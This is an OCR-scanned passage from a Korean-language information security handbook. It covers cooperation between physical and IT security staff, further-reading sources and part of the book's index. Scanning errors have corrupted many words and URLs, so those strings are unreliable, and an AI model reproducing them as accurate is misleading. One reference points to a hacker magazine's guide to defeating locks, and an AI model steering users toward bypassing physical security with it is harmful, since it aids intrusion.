고 두들겨도 경보신호가 난다. 누구도 울타리를 타고 넘어 오지 않는다는것을 몇 
번 검열해 보고 난후에는 경보에 대해 인차 만성화된다. 또 오래동안 경보가 울리 
지 않으면 만성적인 태도가 생기거나 늦게야 반응하군 한다. 드문드문 훈련도 하 
고 경기도 조직하여 단조로움을 깨야 한다. 

7. 비데오감시의 통지 회사의 콤퓨터체계에 접속했을 때 사용자들에 게 그들의 사적 
비밀보장이 부족하다고 통지 해 주듯이 비데오감시를 늘 받고 있다는데 대 하여서도 
사람들에게 알려 주어야 한다. 카메라를 공개적 인 장소에 설치할수 있는 법적근거 
와 관련하여서는 변호사와 토론 하여 야 한다. 

8. 사용자들의 호응 사용자들은 보안조치들이 너무 간섭적이며 힘들며 불안하다고 
생각되는 경우에는 그 타당성정도에는 관계없이 불평할수도 있다. 의견이 많은 경 
우에는 사람들이 그것을 우정 마사 놓을수도 있으며 혹은 경영진자체가 그것을 
없애라고 지시할수도 있다. 로조와도 사전합의를 보아야 할것이다. 로조에서 접수 
하지 않으면 다른 물리보안층을 생각해 내거나 매우 창조적인 사고를 해야 할것 
이다. 때로는 위험성이 접수될수 있는것으로 될지도 모른다. 
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정보기술과 물리적보안의 협동 


협동이라는것은 서로의 요구를 리해하고 보완하기 위하여 리용되는것만은 아니다. 
협동이란 자기가 남에게서 절대로 최우선적인 대우를 받지 못하리라는 리해로부터 출발 
한다는것을 의미한다. 서로의 우선사항에 없어서는 안될 존재로 되자면 어느 분야에 자 
기가 최적인가를 리해하기 위하여 노력하라. 그러한 사고방식으로 일하면 일정한 현실적 
인 발전이 이룩될수 있을것이다. 

협동을 시작부터 잘하려면 방책에 이것이 잘 반영되여야 한다. 방책에는 물리보안림 
과 보안관들의 특수한 역할과 책임관계가 명시되여야 할것이다. 방책들에 언명된 물리보 
안요구조건과 정보기술보안요구들을 비교해 보면 둘사이에 사건대응과 같은 공통적 인 기 
초를 가진 분야들이 나타날수 있을것이다. 명백한 방책이 있든없든 교육，협조，실행이라 
는 세 가지 요소들에 기 초하여 협 동을 진행 해 야 한다. 

교육 

물리 보안실천가들인 보안설계 가들과 보안관들을 초청 하여 일정 한 콤퓨터 보안강습에 
참가하게 하라. 그들을 IT 세 계 에 끌어 들여 어 느 부분에 가장 적 합한가를 리해할수 있게 
하라. 교실환경은 소감을 교환하고 IT 실천가들의 사고방식에 다 적응되는 매우 좋은 장 
소이다. 그들을 학생으로서가 아니라 교사로 강습에 참가하게 하라. 교실에서 보는 관점 
과는 다른 독특한 관점 을 제 시할것 이 다. 전문보안관들은 그들이 흔히 맞다드는 문제 인 
반대 의 견에 부딪치 면 매 우 창조적 인 생 각을 내 놓군 한다. 

강의외 에 도 물리보안성 원들에 게 외부디스케 트가 비 루스를 끌어 들일수 있는 위험성 
이 있다는것，기밀정보의 예비본레프가 도난 당할수도 있다는것과 같은 회사내의 IT 관련 
취약점들에 대하여 교육을 줄수 있을것이다. 이것이 나쁜것이니 회사전체의 리익을 다 
말아 먹는다는 식으로만 이야기해 주지 말라. 구체적인 문제를 이야기해 주라. 어디에 바 
로 그러한 취 약점 이 있다는것 을 찍 어서 보여 주라. 가능하면 그 범죄를 저지시키는데 드 
는 소요시간과 그 범죄를 저지시키는데 어떤 자원을 리용하였는가 하는것까지 리해를 충 
분히 하도록 보여 주라. 실례로 어떤 시설에서 모뎀이 허용되지 않았다든가 어느 를퓨터 
에서 조작체 계를 파괴 하자면 를퓨터케스를 열어 야 한다든가 하는것을 다 알려 주라. 그 
들에게 실지 모뎀이 어떻게 생겼는가를 망대면기판과의 비교속에서 보여 주어야 한다. 
으시대지 말고 그들이 늘 쓰는 말로 설명하라. 즉《전화기선을 꽃을수 있게 벽에 붙어 
있는 자그마한 꽃개를 알지요? 콤퓨터뒤부분에 있는 모뎀에는 그런것이 두개 달려 있습 
니다. 즉 하나는 전화기 를 꽃는것 이 고 다른 하나는 전화선을 꽃는것 입 니 다. 만약 그런 꽃 
개가 하나밖에 없으면 그것은 틀림없이 망기판입니다》. 

협조 

절 차나 접 근조종수단들을 개 발하는 사업 은 정 보기 술보안일 군들과 물리보안일 군들이 
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긴밀히 협조하면 그 질이 개선된다. 사용자들에게 일관성 있게 보이는 경우 사용자들이 
더 도입 하게 될것 이 다. 만약 기밀문건에 특별한 색 갈로 표식을 하였다면 같은 문건의 전 
자본을 담은 디스케트에도 꼭갈은 색갈로 표식하라. 기밀문건을 관건장치가 달린 서류함 
에 넣어야 한다면 전자본도 그와 같은 관건장치 있는 서류함에 보관하여야 한다. 

협조는 또한 위험분석에도 도움을 준다. 계층적인 방어원칙들을 구현하는것은 상당 
히 복잡하며 때로는 비용이 상당히 들게 된다. 적중하고도 창조적인 물리보안을 설계하 
려면 위험관리훈련이 완성되여야 한다. 사실 물리보안실천자들聲 예비봉사기와 같은 항 
목들의 진가를 리해하지 못할수도 있으므로 단순한 하드웨어교체의 가격으로 보기 쉽다. 
예 비 봉사기 에 회 사자료가 담겨 져 있 다면 이 봉사기 가 대 기 ( standby ) 상태 에 서 사용되 고 
있는중이 라면 그 가치 를 그저 하나의 하드웨 어로만 보면 큰 실수일것 이 다. 한편 정 보기 
술보안실 천자들은 물리 적보안통제수단들을 실행시키거 나 교묘하게 피 하는 창조적 인 수법 
과 내부사람들의 절취범위 에 대 하여 잘 모를수 있다. 물리보안실천자들은 대체 로 보안체 
계들의 원가나 실용성에 대하여 더 잘 알고 있다. 기관주변의 경보체계를 보고는 좋아하 
다가 정 문에 서 건물까지 차도밑 에 케 블을 깔아 늘이는데 얼 마나 많은 자금이 들었는가를 
썩 후에 알면 아마 다 놀랄것 이 다. 따라서 회 사나 기 관들이 물리 보안관리자나 물리보안 
관을 한명 둘만큼 큰 경우에 는 그 사람을 설치과정애까지 다 참가시키 라. 위 험평 가전문 
회 사를 사서 쓰거 나 그러한 봉사를 제 공하는 경 우에 는 보안관들중에 물리 보안전문가가 
한명 이 있도록 하며 그들이 보안의뢰성원들과 상담하게 해야 한다. 취약점들과 비상봉사 
대응소요시간，위험 등 데려 온 보안관들이 모르는것을 보안의뢰성원들은 현지에서 잘 
알고 있을것이다. 

협조에서 놓치지 말아야 할 문제들은 사건대응과 관련한 법률과 법조항들，비상계획 
과 갈은 문제들이다. 어떤 류형의 사건들을 대담하게 취급하며 어떤것을 낮은 수준에서 
혹은 시간이 허락하면 취급할것인가에 대하여 합의를 보아야 한다. 어느 한 부서만 올리 
뛰고 내리 뛰고 하는데 다른 부서는 편안히 그 문제해결을 후에 보자는 식으로 할수는 
없다. 이 단계에서 어느것을 먼저 하고 어느것을 후에 하겠는가를 식별해 내고 처리해야 
한다. 예 비봉사기를 도적 맞혔다 해도 거기 에 자료도 없었고 또 망에 침 입하지 않았다면 
그 도난건은 정보기술과에 있어서 그리 중요한 문제가 아닐수도 있을것이다. 그러나 만 
일 그 도적 이 방화출입 문을 깨 여 경 보체 계 를 못쓰게 만들었 다는것 이 물리보안과에 의하 
여 발견되 는 경 우 이것은 생 명 안전과 관련되 는 커 다란 문제 로 된다. 물리 적보안과는 정 
보기술성 원들에게 자기 들이 어느것 에 대 한 조사와 실행을 먼저 추진해 나가겠는가에 대 
하여 통보해 주어 야 한다. 그것 은 봉사기 가 있 던 곳에 대 한 증거문제 에 영 향을 줄수 있 
기때문이다. 이런 문제를 통보해 줄수 있는 방도를 잘 세워야 한다. 


실행 


협조할 때 결정된것들冬 득 집행해야 한다. 그것을 시험해 보아서 어느것이 잘 안되 
는가를 보아야 한다. 그래도 안되는 일이 있으면 교육과 협조단계를 다시 거처 해결해야 
한다. 실행과정에 대한 세밀조절은 지속적으로 해야 할 공정 이다. 
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보충적인 정보 


출발점으로 되는것은 산업보안협회 (ASIS) 이 다. 주소는 www.asisonline.org 이 다. ASIS 는 
보안관리교육을 진흥시키 는 단체 로서 ASIS 보호자격 전문가 (CPP) 과정안을 제 공한다. 그들 
의 Web 폐지 에서는 많은 참고자료와 출판물들을 찾아 볼수 있다. 

다른 하나의 기관은 해외보안자문리사회 (0SAC) 이다. 국무성에서 1985 년에 설치한 
이 0SAC 는 정 부와 해 외 에서 운영 되 는 사영 부문과의 합영 기관으로서 보안관계정보의 교 
환을 도모하고 있다. OSAC 는 투자，시설，인원，지적재산 등을 해외에서 보호하는데 필 
요한 정보를 제공한다. 보충적 인 정보는 주소 www.ds-osac.org 에서 볼수 있 다. 

물리보안상담역을 채 용할 때 에는 CCP 자격 이 있는가를 보며 그와 병 행하여 IT 분야에 
경험이 있는가를 알아 보라. 정보기술보안과 물리보안 두 분야의 전문지식자격은《정보 
체계보안전문가자격》 (CISSP) 이다. 상담역이 전문가자격이 없으면 그의 경험과 배경을 
알아 보기 바란다. 련관 있는 좋은 경험과 배경에 전문자격까지 있으면 상당할것이다. 

교육통계전국쎈터 는 http://nces.ed.gov/pubs98/safetech/chapter5,html°ll 물리 적보안에 관 
한 일 련의 좋은 상식 자료들과 검 사대조목록을 제 시 하고 있 다. 원래 학교들에 서 사용할것 
으로 예견되였지만 많은 경우 상식자료들은 그 어느 분야에서도 적용할수 있다. 

관건장치에 관심이 있다면 http://www.rc3.Org/archive/infornV5/4.html 에 좋은 기초자습본 
이 있 으니 볼수 있 을것 이 다. 현재 는 발간되 지 않는 이 전 해 커 잡지 Informatik 에 는 기 초적 
인 자물쇠 류형 과 그것 을 깨 는 방법 들이 들어 있 다. …여년전의 잡지이 므로 보안성 이 높 
은 관건장치 들은 취 급되 지 못했지만 간명하며 내 용이 있 다. 

http:/ 八 vww.infosyssec.org/infosyssec/phyfacl.html 에 는 물리 보안회 사들파 물리 보안관계 정 
보들이 어지럼증이 날 지경으로 많이 목록화되여 있다. 물리보안을 시작하는 사람들이 
여기부터 먼저 들릴 필요는 없다. 경험 있는 실천자들이 여기에서 해당 판매업체와 해당 
정보를 찾으면 좋을것이다. 


결 론 


자료보호에 서 난문제 가 제 기 되 였 을 경 우 현명 한 IT 보안관리 자라면 물리 보안전문가의 
충고를 귀담아 들을것 이 다. 보안이 접 근조종이 며 보안은 계 층화된 방어 를 통해 서 만 최 상 
의 효과를 달성할수 있다는것을 알아야 한다. 계 층적인 방어 에는 넓 이，길 이，억제 라는 
특징들이 있어서 모든 부분을 포괄하여야 하며 그 포괄범위는 예비적인 비상사태까지도 
해 당된 다는것 이 다. 매 계 층에 리용할수 있 는 기 술들은 상당히 많다. 보안상요구가 낮을 
경우에 출입문에 관건장치나 하나 달아 놓는것으로 그칠수도 있지만 보호대상의 가치와 
해 당 위 험 요소가 콜수록 보안상고려 는 더 욱 강조되 여 야 하는것 이 다. 탐지 하고 분석할 겨 
률이 있는가，억제가 1차적인 목적인가 등을 구체적으로 알아 보아야 한다. 그리고 자기 
기 관의 IT 보안전략에서 취 약적 인 요소들이 어느 위 치를 차지하며 그것들을 수정하거 나 
추켜 세우려면 보안전략에서 어느 부분을 고처야 하겠는가를 알아야 한다. 앞에서 본 5 
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가지 사항 즉 식별하라，표식하라，보호하라，추적하라，알고 있으라를 현존전략에 대한 
검토나 새로운 전략작성에 리용하면 물리보안과 수자식보안이 서로 얼마나 보완적 인가를 
분석할수 있으며 나머지 미흡한 점들을 근원적으로 밝혀 낼수도 있을것이다. 그러나 물 
리 보안전문가들과 수자식 보안전문가들사이 의 세 부적 인 협 조와 합심 이 없으면 실 천적 으로 
는 이 미흡한 점들은 정확히 제거되지 못할것이다. 그 호상관계들을 방책과 절차에 밝혀 
주어야 하며 호상 전습하는 사업에서 그 관계를 확립해야 한다. 자기 분야의 장점들과 
특히 단점도 호상전습에서 밝혀 야 한다. 잊지 말아야 할것은 물리보안이나 수자식보안이 
나 다같이 접근조종이라는 공동의 목적을 가진다. 이것을 달성하면 물리적으로나 수자식 
으로나 안전한 느낌을 가지고 공포와 의심에서 벗어 날수 있을것이다. 
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경계관문규약 ( BGP ) 246 
경량디 렉 터 리접근규약 ( LDAP ) 571 
경로기설정 99, 102, 106 
경로기설정설비 102 
경로기접근목록 105, 108 
경로기접근조종 104, 106 
경로기조종자 359 
경로기에 기초한 VPN 145 
경로기의 초기화 99, 100 
경로기의 하드웨어와 쏘프트웨어의 구성요 
소 97 

경로선택지능 66 

경보장치 36, 392, 422, 451, 634 


경보조종기 644 

경제협 력 개 발기구 ( OECD ) 301, 496 

경영자측의 지원 280 
경영진의 결심재택 446, 454 
고객지원체계 23 
고리형구조 71, 72 
고밀도부호화 455 
고속분석 해결기술 ( FAST ) 582 
고속이쎄비트 (Fast Ethernet ) 78 
고차원무게공간 554 
고유식별자번호 ( IHN ) 17 
고위인증국 374 
공격대상콤퓨터 35 
공격표적 36, 385, 395, 540 
공공교환전화망 ( PSTN ) 125 
공공봉사기 461 
공극 ( air - gap ) 204 

공개열소 I 암호화 17, 120, 296, 475， 

공개열소 I 암호화기술의 우점 371 
공개 열쇠 암호화체계 368 
공개열소 I 에 기초한 열소 I 교환 475 
공식적인 평가 447 

공정성 304, 326, 405 
공틍관문대면부 ( CGI : Common Grateway 
Interface ) 427 
공틍형식의 설정 320 
공안감시체계 18 
공안감시카메 라체계 18 
공유집선기 89 
교갑화 ( encapsulation ) 531 
교사 없는 학습 545 
교재를 리용하는 강습 288 
교환기 6, 41，65, 93, 144, 186, 249, 257, 
381, 395, 401, 649 
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구문해석자 461 

구문해 석 프로그람 458 

구성관리 ( CM ) 403, 409 

구성관리실행 423 

구성상태 통보활동 420 

구조화된 자료 463, 479, 528, 531 

구조화된 자료기지관리자 528 

구획화 142, 530, 636 

국대국련결회선 69 
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국부화 528, 529 
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규모설정 371, 378 
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규제방책 310 
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기관보안방책 490 
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하부구조 보안 공정 340 

기본문제전문가 ( SME ) 605 
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기성유선망 88 

기성위험분석 355 

기술기능평가 377 

기정값설정 35, 185, 429 

기타 태그들의 악용 437 

기한만기날자 373 
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기업거래 476, 497 

기 업보안기본구조 375 

기업보안태세 396, 400 


기업지 속계획작성자 359, 361 
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Management ) 359 
기업영향분석 ( BIA : Business Impact 
Analysis ) 361 

기업운영정지 시간 (down time ) 564 

긴급동의 27 

개발계획작성 376, 380 

개발과제관리 560 

개 발과제관리전략 560 

개 방형 자료기 지 접 속성 ( ODBC ) 398 

개별화체계 571 

개별 WAN 대역너비 138 

개선된 수자식종합틍신망 H 7 
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개인정보침해 487 

개인 휴대형 정보처리 기 H 0, 133 

개인인증 15, 18 

객체지향계산 456 

객체지향관계 527 

계층적방어 641, 645 

계층인증 376 

과정계획작성 282 

관계무결성 528 

관계 형 자료기지 관리자 528, 531 

관계 형 자료기 지 관리 체 계 ( RDBMS ) 452 

관계 형 자료기지 응용프로그람 479 

관계형자료기지에서 수자식서 명 475, 483 

관리능력 136, 151, 181, 240 

관리자구좌 160, 432, 647 

관문조종 257 
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Active Server Page ) 427 
능동집선기 88 
내부 VPN 관문 142 
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내부망 VPN 응용의 안전을 위한 평가기준내 

용 143 

내부지식구조 553 
내향성 TCP 파케트 106 

내용관리 467, 572, 574 

ᄃ 

다국간접근장치 ( MSAU ) 81 
다목적신용카드 33 
다목적 자료기지전단 482 
다자태빚섬유 ( MMF ) 84 
다중규약표식 교환 138 
다중생 체 측정 식 별 체 계 (Multimodal 
Biometric Identification System ) 16 
다중자료기지표 479 
다중전송주소 (multicast address ) 109 
다중접속장치 74, 76 
다층역전파망 542, 544, 546 
다층역전파망의 입력 마디점 547 
다학과적인 방어 646 
단순망관리규약 ( SNMP ) 108 
단일방향적인것 368 
단일자태빚섬유 ( SMF ) 84 
단일점고장 518, 525 , 591, 593, 602 
담보성 405, 591 
도로건설계절 450 

도시망 ( MAN : Metropolitan Area Network ) 67 

도청프로그람 41 
돈주머니공유 488 
동시방송수단 41 
동적 HTML 457 
동적기입사항 109 
동적생성 Web 페지 441 
동적접근목록 109 
동적인 오유검출과 수정 529 
동정심을 리용한 공격 55 
동축케를 66, 77, 89 
두요소인증 31, 368 


두요소인증체계 31 
디렉터리봉사 571 
디스크공유정보 574 
디 스크자두쓰기 고장 603 
대규모 VPN 144 
대리자 ( proxy ) 646 
대칭적 쿄드화체계 369 
대칭적열소 I 371 
대칭알고리듬 508, 510 
대화형 영업프로그람 469 
대용량전자상업거래 싸이 트 358 
대 입선형 변환망 ( substitution-linear 
transformation network ) 513 
되돌림주소 (loopback address ) 109 
뒤문 및 오유수정선택항목 429, 435 
뒤문치기수법 47, 48 

E 

량자콤퓨터 515 

련결부 ( patch ) 81, 95 

련결 상태 경로조정규약 244 

련결성 ( connectionist)AI 리론 541 
련속리용성 ( CA ) 584, 591 

련속학습모형 553 

령아닌존속 ( non-zero duration ) 있4 

령역이■봉사기 38 

론리적(기술적)보안 58 

론리적공격 86 

론리적 구획 화씨나리 오 142 

리해관계의 충돌 304, 306 

린 s 알고리듬 (Rijndael Algorithm ) 512 

림상정보 22 

례외조항 155, 316, 321 
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마디점려기함수 551 



마크로언어 483 
망 및 인테^트보안개론 291 

망■합조작체계 ( IOS : Internetwork Operating 
System ) 105 
망구성방법 65 
장난질쿄드 63 
망다리 65, 89, 91，96 
망대면부 41，42, 43 
망대면부기판 ( NIC ) 89, 148 
망대 면부기 판구동기 148 
망막스캐너 14 

망보안 18, 65, 92, 108, 131, 153, 187, 
253, 295, 442, 483, 571 
망시간규약 ( NTP)RFC 1305 163 

망접속롬과암호 90 
망접속하드웨어 주소 42 
망조작체계 ( NOS ) 90 
망주소명단 36 
망형침입 탐지체계 386 
망암호화 450 
망용도롬계자료 392 
망운영쎈터 ( NOC ) 249 
망의 위상구조 68, 81, 88, 376 
명령웰 46 
명시적인 사영 553 
모템묶음 (modem pool ) 241 
모선형구조 69 

모의부하검사 (simulated load testing ) 576 

무결성검사 48, 163 

무결성과 현행성 530 

무게백토르 542 

무료쏘프트웨어 35, 206, 572 

무료 ARP 43, 44 

무릎형콤퓨터 H 0, 216, 449, 636 

무상태 파케트검사 106 

무선 LAN ( WLAN ) 253 

무선 LAN 기판 221 

무선 망대 면 부기 판 ( WMC ) 96 

무선물리층보안 88, 96 


무선보안 224 
무선산업 110 
무선 전자우편 특정 장치 221 
무선전화 17, 36, 111，125, 221 
무선틍신망 64 
무선응용규약 ( WAP ) 121，133 
무선인테 <11 트 110, 120, 122, 127 
무선인테 II 트보안 110, 113 
문맥에 기초한 접근조종 ( CBAC ) 105 
문서형식정의 ( DTD ) 469 
문서형정의대상 456 
문의소 ( helpdesk ) 54 
물리적공격 86, 344 
물리적매체 68, 75, 85 
쿨리적보안 58, 96, 133, 163, 184, 254, 
349, 376, 626, 650, 654 
물리적보안기술 643 
물리적 보안틍제수단 133, 635,653 
물리적보안의 기본역할 645 
물리적보안의 심리 626, 628 
물리적보안의 함정 650 
물리적 자료프레임 66 
물리 평면:7 ᅡ능 ( PHP - enabled)Web 
봉사기 40 
묵기 ( binding ) 531 
미세정신 (atomic update ) 532 
밀기 ( wipe ) 편의프로그람 611 
매주 7일간 매일 24시간요구사항 361 
매체독립대면부 ( Mil ) 79, 80 
매체접근조종 42, 80, 91, 255 
매체접근조종 ( MAC ) 주소범람 42 
메타문자 441 
메타자료봉사 494 
메인프레임방식 443, 453 
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반목기 65, 66, 78, 89 

반복성 423 
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반송파수감다중접 근/충돌검 출 73 
발표단계 324 

방문자쿠키 (visitor cookie ) 228 

방책계획화 308 
방책류형 310 
방책작성기법 314 
방책에 기초한 경로조정 244 
방책에 대한 경영측의 지원 308 
방책의 직결배포 319 
방화벽관리의 문제점 392 
방화벽전문가 359 
방화벽에 기초한 VPN 145 
방화벽의 형태 390, 391 
변경조종 (change control ) 565 
변칙탐지 186, 385, 540, 541 
별형망 65, 70, 88 
보강프로그람 ( patch ) 223 
보건 관계자료기지 23 
보건관련인 터 비트거래량 32 
보건정보비밀성 29 
보험정보 22 

보호원가 대 재해복구/교체원가사이의 관 

계 642 

보안강습 29, 21公， 285, 291 
보안검사 185, 375, 379 
보안공정 29, 270, 360, 390, 400, 449, 454 
보안공학모형의 목표 406 
보안공학적공정 407 
보안구성요소 447, 474, 643 
보안구조 157, 187, 360, 376, 438, 447, 
562, 570 

보안구현모형 377 

보안기능요구 490 

보안기초 및 인식 279 

보안기틀축성 447 

보안관련 부분프로그람 376 

보안관련 세부과제 378 

보안관리 봉사제공자 130, 144, 152 

보안대책 47, 60, 93, 108, 154, 174, 184, 


198, 200, 240, 360, 432, 446 
보안모형 163, 299, 300, 301, 303, 327, 
437, 635 

보안목표 282, 303, 490, 636 

보안봉사요구 490 
보안사슬 396 

보안실천 180, 206, 276, 360, 392, 408, 
456, 465, 638, 640, 653 
보안 자료수집과 기록부관리문제 397 
보안방책 29, 59, 109, 127, 135, 140, 155, 
167, 198, 210, 264, 295, 308, 327, 335, 
378, 391, 478, 490, 540, 640, 650 
보안체계내부의 론리흐름 489 
보안틀거리설계 377 
보안태세향상 390, 401 
보안환경 183, 368, 426, 437, 490 
보안환경의 특징 490 
보안예산 295, 338, 358, 375 
보안의식 53, 186, 272, 285, 294, 390, 447, 
626, 638 

보안의식화과정 273, 447, 454 
보안의식화자료 274, 276 
보안의식 화깜뺘니야 275, 276 
보안원칙 155, 308, 315 
봉사거부공격 ( DoS ) 184 
봉사거부공격에 대처한 적재제한 222 
봉사준위협약 564 
봉사의 질 151 
부분망마스크 93 
부착단위대면기 74 

부인방지 32, 194, 209, 296, 370, 380, 471, 
481, 508, 574 

부인방지기능 367 

부의 허위률 540 

분리된 자료토막 478 

분리와 독립성 531 

분산형공격 34, 40 

분산형 봉사거부공격 35, 359 





분산형스캔 39 
분산형 롬과암호해독 35, 37 
분산형포구스캔 35, 40 
분산형 포구스캔도구 39 
분산쏘프트웨 어기 술 467 
분석과 정량화 336, 340 
분석모형화 495 
불평싸이트 608, 614, 618, 619 
M 로크암호변환기 147 
비동기전송방식 151, 152 
비 대칭적 암호과정 369 
비대칭열쇠구조 371 
비대칭열쇠체계 519 
비데오를 리용하는 강습 288, 290 
비무장지대 ( DMZ ) 182, 399, 569 
비밀정보를 처리하는 망 IT 보안기초 291 
비밀쿄드 (secret code ) 531 
비밀열쇠 17, 33, 119, 225, 296, 368, 374, 
518, 520, 525 
비밀열쇠체계 368 
비법적인 자료열람 29 
비법접근 51, 88, 94, 123, 135, 142, 184, 
200, 303, 371, 380, 496, 637 
비상대책계획 화봉사 262 
비상대응능력 58 
비상사태운영센터 ( EOC ) 605 
비휘발성 RAM 98 
비요청전자우편 215, 225, 608, 621 
빚섬유결선 ( FOIRL ) 78 
빚흐■기법 16 
배너 ( banner ) 광고 231 
배선 경로조정체계 85 
배선방식 73, 76, 80 
배선의 취약성 85 
백색소음 397 
백토르마당값 16 
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사건관리전문가 359 

사건대응 344, 358, 383, 435, 652 
사건대응준비 363 
사건대응림 36, 61, 389 
사고처리 291, 297, 389 

사무자동화 21 

사적 비 밀관련 업무요구사항 487 
사적 비 밀관련도구프로그람 507 

사적비밀권 28, 497 
사적 비 밀 메 타자료봉사 506 
사적비밀보장 26, 96, 367, 373, 390, 488, 
500, 501, 651 
사적 비 밀보호조항 27, 29 
사적비밀상실 25 
사적비밀선택안 492, 493, 505 
사적 비 밀표현요소 498, 503, 506 
사회공학 12, 的，216, 的6, 650 
사회공학적공격 56, 61 
사회공학적수법 12 
사회공학의 정의 52 
사영관리령역 ( PRMD : Private Management 
Domain ) 208 

사용기록부 137, 157, 381, 383, 388, 
433, 464 

사용기록부기 입 내용 (log entry ) 543 

사용방식보고 222 
사용자감시 222 

사용자식별 12, 17, 258, 259, 567 
사용자조작방식 102, 103 
사용자인증서 하쉬 ( UCH : User Certificate 
Hash ) 523 
사유패턴 538 
상급 ISSO 강습 291 
상급경영자 265, 273, 321, 556 
상사형모뎀 68 
상표권침해 615 
상표회석 614 
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상용싸이트 366 
서명형탐지체계 185 
선택쿠키 (preference cookie ) 228 
설비로화 57, 603 

설정지령 101 
성능시험방법 20 
성실성의 의무 306 

소규모사무실 및 가정사무실 ( SOHO ) 238 
소비자거래 494, 497 
소비자보유 488, 495 
소비자호출쎈터 563 
소비자의 상품구입 관습정보 558 
소송관련비용 489 
소유총비용 69, 488 
속임 ( hoax ) 비루스 218 
수값과 날자값 481 
수자식가 입자선로 153 
수자식상업형태 367 
수자식서명기술 475 
수자식서 명통합개발과제 482 
수자식서 명통합방법 479 
수자식서명의 개념 475 
수자식 종합롬신망 ( ISDN ) 132 
수자식인증서 17, 20, 32, 46, 119, 136, 137, 
140, 152, 224, 368, 373, 523, 558, 649 
수정조종체계 ( RCS ) 412 
수출통제법 559 
수학적모형 300 
수익손실 556 
순환여유검사 ( CRC ) 101 
숨기기 ( hiding ) 531 
숨은 마당 429 

스마트카드 13, 33, 61, 115, 136, 368, 377, 
443, 452, 510, 642 

스마트카드식 롬표 367 
스마트카드읽기 장치 11 ，32 

스타일쉬트 (style sheet ) 456 

스트림 암호변 환기 147 

스패 머 ( spammer ) 215 


스 IS ( spam ) 215 

시간국 ( TA : Time Authority ) 521 

시간국의 수자식서명 522 

시간동기화 163 

시간에 덜 민감한 틍신망 247 

시동통과암호 90 

시분할다중접근 ( TDMA ) 114 

시설보호전략 634 

시설에 대한 위협과 통제 630 

시설의 구분 628 

시설의 물리적보안 628 

시설의 위치 629 

시작태그와 끝태그 468 

시장거래비용 489 

식별휘장 的7, 632, 633 

신경회로망 536, 540, 555 

신경회로망과학 553 

신경회로망침 입 탐지체계 541 

신경회로망학습에서 의 수학적처 리 554 

신경회로망을 리용한 패턴정합 539 

신경회로망의 학습능력 536 

신뢰구축사업 341 

신뢰도 18, 46, 76, 107, 121, 134, 149, 
414, 422, 641, 651 

신뢰령역 328 

신뢰모형 327, 333 
신뢰문제 326, 333 
신뢰성악용 437 
신뢰업무 330 
신중성구간 338 

신용카드 115, 140, 236, 373, 428, 572, 617 

신용카드거래 32, 459 
신용카드번호 120, 227, 231, 232, 427, 
459, 476, 622 

신원협잡 17 
신원형접근조종 490 
실시간처리 20 
실제적가능성 554 
실행기록부 464 
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실행모형설정 376 
새 련합공동모형 ( NAPM ) 416 
새끼요소들의 순서 469 
생체 계측교환파일 공통형식 19 
생체계측모형 16, 19 
생체계측지표 13, 19, 136, 367 
생체계측학 16, 443 
생체계측학적 수법 12, 18 
세계공용 자료속도개선 체계 117 
세부취약점 454 
세분적접근조종 28 

ᄌ 

자동망교환대 (Automotive Network 
Exchange ) 140 
자동정보체계 ( AIS ) 416 
자동현금입출기 15, 16 
자료기지 구동형응용 475 
자료기지 관리체계 무결성 526 
자료기지무결성 526, 532, 533 
자료기지봉사기 234, 427, 433, 451, 4的， 
476, 483 

자료기지후열■적 30 
자료뒤져보기 30 
자료로출우 I 험 348 
자료명 479 

자료무결 성 보호기능 505 

자료보관고 (data warehouse ) 426 

자료보관고의 보안 7, 487 

자료 M 로크 481, 513 

자료시장 (data mart ) 426 

자료적재 494 

자료전송방향 43 

자료처리 이동전화 133 

자료채취 (data mining ) 487 

자료해석스키마 460 

자료쎈터 23, 123, 536, 596, 607, 629 

자료암호화표준 ( DES : Data Encryption 


Standard ) 509 
자료압축 135, 149 

자료의 무결성 101, 131, 141, 367, 443, 
462, 481, 527, 567, 645 

자료의 물리적위치관계 534 

자료의 ■합정리 571 

자료의 편의성과 가치 464 

자료의뢰서 ( RFI ) 378 

자만심을 리용한 공격 55 

자체구성사영 ( self-organizing map ) 544 

자연적위협요소 630 

자원계획화 378 

잠그기 ( locking ) 532 

장바구니쿠키 (shopping basket cookie ) 228 

장파레이자 80, 83 

자바봉사기페지 ( JSP : Java Server Page ) 427 
적극적보안 384, 400 
적극적엿보기 34, 41, 46 
적극적 엿보기기법 42 
적재가능 핵심부모듈 ( LKM ) 50 
전개단계 279, 323 
전단 37, 118, 333, 483 
전략계획 작성 그룹 348 
전문가과제 537, 539 
전문적인 중계도구 45 
전송층보안규약 153 
전송 흐름 구성도 구 36 
전자거래 25, 295, 558 
전자기업 558, 559, 560 
전자기업구조 569 
전자문서제품 482, 483 
전자문서 쏘프트웨어 483 
전자상업거래분야에서 안정성 및 
보안 556 

전자 상업거래 조작 체계가 동 환경 574 
전자 상업거래 응용 프로 그람 463, 569 
전자상업거래 예산 358 
전자상업거래의 하부구조 556, 569 
전자상업거래의 중절 353 
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전자수감 13 

전자자금전달 ( EFT ) 체계 355 
전자자료교환 ( EDI ) 355, 456 
전 자지 갑응용프로그람 459, 460 
전자출판 318, 319, 473 
전자릉신체계 313 
전자우편목록 54 
전자우편 방화벽 제품과 봉사 222 
전자우편 보안도구 222 
전자우편봉사기 209, 219, 223, 572 
전자우편 암호화체계 222 
전자우편운용호환성을 가진 반비루스 
체계 222 

전 자우편 위 험 요소 223 

전자우편의릐기 209, 217 

전통적 정보위험관리수법 355 

전통적인 루트키트 47 

전통적인 정보기술보안 640 

전통적인 재해복구계획 화방법의 결함 583 

전통적 인 롬과암호해독도구 37 

전통적인 WAN 환경 242 

전통적인 이써비트망 65 

전통형스캔 39 

전통형 엿보기 공격 41 

전통형 엿보기도구 41 

전통형이써비트 41 

전용롬표고리망 81 

전용하드웨어식 VPN 제품 143 

점대점구조 68 

접근배제 20 

접근조종 27, 42, 101, 131, 140, 156, 193, 
210, 225, 238, 259, 270, 293, 348, 367, 380, 
451, 4後，472, 490, 505, 532, 569, 634, 650 
접근조종목록 ( ACL ) 29, 368 
접근조종체계 12, 58, 376, 394, 449 
접근카드번호 17 
접 속; | ( connector ) 69 
접속개시암호 641 
정량적위험분석 345 


정량적 위험평가방법 337 
정방향전파 547 
정보검사한계 107 
정보기술 판매업체 376 
정보기술의 주요목적 51 
정보마당 82 
정보보호전략 358 
정보보호방책 313 

정보보안 12, 23, 51，87, 111，135, 155， 
204, 259, 281，300, 325, 355, 370, 397, 
414, 442, 470, 537, 580, 596, 626, 641 
정보보안계획 24, 267, 638 
정보보안관리 382 
정보보안관리 편람 11，415, 580 
